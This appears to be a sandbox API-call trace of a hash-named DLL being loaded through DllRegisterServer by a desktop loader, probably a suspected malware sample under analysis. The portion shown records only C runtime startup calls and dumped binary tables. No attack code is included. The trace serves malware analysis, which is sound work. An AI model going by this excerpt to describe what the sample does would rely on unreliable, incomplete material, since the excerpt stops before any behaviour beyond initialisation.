\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x100) returned 0x451c20 [0075.973] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x176) returned 0x449aa0 [0075.973] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0075.973] GetLastError () returned 0x0 [0075.973] SetLastError (dwErrCode=0x0) [0075.973] GetEnvironmentStringsW () returned 0x454680* [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9cc) returned 0x455060 [0075.973] FreeEnvironmentStringsW (penv=0x454680) returned 1 [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x118) returned 0x449ff0 [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3e) returned 0x450cc0 [0075.973] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x5c) returned 0x440780 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x444c00 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x78) returned 0x44c6f0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x445a40 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x28) returned 0x44b530 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x48) returned 0x450220 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1a) returned 0x44b3b0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x4503b0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x62) returned 0x444970 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2a) returned 0x44c770 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x444c70 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1c) returned 0x44b560 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd2) returned 0x445cd0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x7c) returned 0x444000 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3a) returned 0x4506d0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x90) returned 0x443c20 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b860 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x30) returned 0x4449e0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x36) returned 0x445ab0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x450900 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x52) returned 0x4494a0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c) returned 0x4502c0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xd6) returned 0x445610 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2e) returned 0x4420d0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1e) returned 0x44b6e0 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x442110 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x54) returned 0x449320 [0075.974] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x52) returned 0x449140 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b620 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x42) returned 0x450630 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x2c) returned 0x442150 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x44) returned 0x450680 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x24) returned 0x44b890 [0075.975] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x455060 | out: hHeap=0x440000) returned 1 [0075.975] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1000) returned 0x454680 [0075.975] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0075.975] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0075.975] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0075.975] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x449770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0075.976] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0076.026] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0076.026] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0076.027] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0076.027] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0076.027] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0076.029] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0076.029] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0076.030] GetProcessHeap () returned 0x440000 [0076.030] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0076.030] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0076.030] GetLastError () returned 0x0 [0076.030] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0076.030] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0076.030] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x455b10 [0076.030] SetLastError (dwErrCode=0x0) [0076.031] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1200) returned 0x455ee0 [0076.032] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0076.033] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0076.033] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0076.033] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0076.033] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0076.033] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer" [0076.033] GetACP () returned 0x4e4 [0076.033] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x228) returned 0x44aca0 [0076.033] IsValidCodePage (CodePage=0x4e4) returned 1 [0076.033] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0076.033] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0076.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.034] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0076.034] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0076.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0076.035] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0076.035] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0076.035] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0076.035] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0076.035] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0076.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.035] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0076.035] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0076.035] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0076.035] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0076.035] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0076.036] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1000) returned 0x4570f0 [0076.037] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0076.037] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0076.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0076.037] AreFileApisANSI () returned 1 [0076.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0076.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0076.037] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xcb) returned 0x444860 [0076.038] GetEnvironmentStringsW () returned 0x458100* [0076.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0076.038] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x4e6) 